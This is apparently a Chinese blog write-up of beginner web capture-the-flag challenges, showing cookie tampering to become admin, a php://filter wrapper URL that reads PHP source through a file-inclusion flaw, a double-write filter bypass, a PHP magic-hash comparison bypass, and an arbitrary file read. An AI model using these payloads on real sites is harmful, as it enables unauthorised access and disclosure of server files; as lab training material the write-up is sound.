i_love_cookie
id=guest
,改成id=admin
即可。

proxy
看到一个链接:
/index.php?url=http://naver.com
猜测是文件包含,可以读到admin.php
:
/index.php?url=php://filter/read=convert.base64-encode/resource=admin.php
<?php
$flag = 'flag{basic_SSRF_XDDDDDDD}';
if($_SERVER['REMOTE_ADDR'] === '127.0.0.1' || $_SERVER['REMOTE_ADDR'] === 'localhost' || $_SERVER['REMOTE_ADDR'] === '::1'){
echo $flag;
}
else{
echo 'hmm? you are not local ip';
}
这题原意是ssrf
吧。
easy_Web
看到一个id
,尝试输入:id=admin
看到admin
被过滤了。

双写:
adadminmin
。只剩下
n
,猜测admi
也被过滤了。
构造:
adadmiadminmin
。
magic
有个source.phps
:
<?php
$flag = "^^";
$user_hash = $_GET['GOGO'];
if(sha1("10932435112") == md5($user_hash)){
echo "<h1>".$flag."</h1>";
}
else{
echo "no... -_-;";
}
?>
看下sha1("10932435112")
的结果:

所以只要找个
md5
值也为0exxx
的值就可以了。构造:
?GOGO=QNKCDZO

readme
看到file=1.jpg
:

有个任意文件读取:

题目没给
flag
,我自己放个在根目录下:
总结
入门题目,无聊玩玩。
网友评论